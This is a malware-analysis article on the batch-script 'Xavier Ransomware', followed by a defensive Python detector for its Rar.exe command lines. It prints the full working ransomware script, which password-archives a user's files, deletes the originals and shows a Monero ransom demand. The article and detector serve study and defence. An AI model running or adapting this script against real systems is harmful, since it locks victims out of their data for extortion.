
Xavier Ransomware

By GoldSparrow in Ransomware

The Xavier Ransomware is a non-standard Trojan that is placed under the crypto-threat class of cyber-threats. The Xavier Ransomware was added to AV databases on January 5th, 2019, and it may be delivered to users via corrupted advertisements, spam emails, macro-enabled documents, and fake updates for the font used in your Web browser. What is interesting about the Xavier Ransomware is that it is loaded not as a compiled program but as a BATCH script. The technique has been used by very few threat actors in the past because of its limitations and the scant options it offers for code obfuscation. However, the Xavier Ransomware resembles the RarVault Ransomware in its ability to launch legitimate software and use it for nefarious purposes.

As mentioned above, the Xavier Ransomware is packed as a BATCH script that researchers collected as 'Encoder.bat' from a security platform. The 'Encoder.bat' script revealed that its authors rely on the WinRAR software by win.rar GmbH being installed on the compromised systems for the attack to succeed. Many other cyber-threats leverage legitimate, clean applications to facilitate attacks on users, but the Xavier Ransomware is surprisingly simple in how it works. The Xavier Ransomware is executed in ten lines of code that create a password-protected archive with the user's data and show a short ransom message on the user's screen. The entire code for the Xavier Ransomware can be found below:

@echo off
set filename="LOCK.rar"
set commentsfile=info.txt
set pass="xavier"
set comment="Files Blocked! CONTACT: SENT 0.3 XMR TO 0x0050d76893de9E045fbaBCDb6A58dC714BDd"
msg * %comments%
"%PROGRAMFILES%\WinRAR\Rar.exe" a -r -y -ri15 -df -m0 -inul -p%pass% %filename%
echo %comments% >> %commentsfile%
"%PROGRAMFILES%\WinRAR\Rar.exe" c %filename% -z%commentsfile%
del %0

Please note that you should not save and run this script on your PC if WinRAR is installed and you do not want files on your computer deleted. The Xavier Ransomware is designed to create a vault named 'LOCK.rar' on the system drive and place all documents found in the user's home folder inside it. The Trojan is named after the password found in samples, 'xavier,' which is used for 'LOCK.rar.' The Xavier Ransomware writes a file called 'Info.txt' to the Temp folder and loads it on the screen once the user's content is placed in the archive vault. 'Info.txt' contains the following: 'Files Blocked! CONTACT: SENT 0.3 XMR TO 0x0050d76893de9E045fbaBCDb6A58dC714BDd' and directs users to pay 0.3 XMR (≈15 USD/13 EUR) to a wallet address.
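A defender-side check that follows from the script above: the Xavier call to Rar.exe combines the archive verb with -df (delete sources) and a -p password, and a second call stamps the note into the archive comment with -z. This added example (not from the article or from any vendor product) scans constructed process-creation records for that switch combination; the event shape, field names and severity labels are assumptions made for the example.

```python
import re
from typing import Dict, List
# Constructed process-creation events (Sysmon Event ID 1 / EDR shape), written
# for this example, not telemetry from a real incident. The first mirrors the
# batch script's expanded Rar.exe call (set pass="xavier" becomes -p"xavier").
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Program Files\WinRAR\Rar.exe" a -r -y -ri15 -df -m0 -inul -p"xavier" "LOCK.rar"'},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\WinRAR\Rar.exe" a -r backup.rar D:\Projects'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Program Files\WinRAR\Rar.exe" c "LOCK.rar" -zinfo.txt'},
]

# Switches the Xavier script chains: -df deletes sources after archiving, -p<pw>
# password-protects the archive, -inul hides errors, -z<file> adds a comment.
SWITCH_RE = re.compile(r"(?<!\S)-(df|p\S*|inul|r|z\S*)(?!\S)")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # keeps quoted paths as one token

def analyse_rar_cmdline(cmdline: str) -> Dict[str, object]:
    """Classify one Rar.exe command line: verb, notable switches, severity."""
    tokens = TOKEN_RE.findall(cmdline)
    verb = tokens[1].lower() if len(tokens) > 1 else ""
    switches = {m.group(1) for m in SWITCH_RE.finditer(cmdline)}
    deletes = "df" in switches
    password = any(s.startswith("p") for s in switches)
    comment = any(s.startswith("z") for s in switches)
    if verb == "a" and deletes and password:
        severity = "high"    # archive, delete originals, lock behind a password
    elif verb == "c" and comment:
        severity = "medium"  # comment written into an archive: note drop
    elif verb == "a" and (deletes or password):
        severity = "low"     # half of the pattern; worth correlating
    else:
        severity = "info"
    return {"verb": verb, "switches": sorted(switches), "severity": severity}

def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per Rar.exe launch; other images are skipped."""
    findings = []
    for ev in events:
        tokens = TOKEN_RE.findall(ev["cmdline"])
        image = tokens[0].strip('"').rsplit("\\", 1)[-1].lower() if tokens else ""
        if image != "rar.exe":
            continue
        finding = analyse_rar_cmdline(ev["cmdline"])
        # cmd.exe parent matches the batch-script delivery; explorer.exe is routine
        finding["scripted"] = ev["parent"].lower().endswith("cmd.exe")
        findings.append(finding)
    return findings
```

A routine backup job with Rar.exe scores "info" here; only the delete-plus-password combination the script relies on reaches "high", which keeps the rule usable on hosts where WinRAR is legitimately installed.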

The Xavier Ransomware has not been distributed widely, and it is not perceived as a significant threat to users, but it may evolve. It is best to make backups regularly and avoid questionable advertisements on the sites you visit. Detection names for the Xavier Ransomware include:

Trojan ( 00491e9a1 )
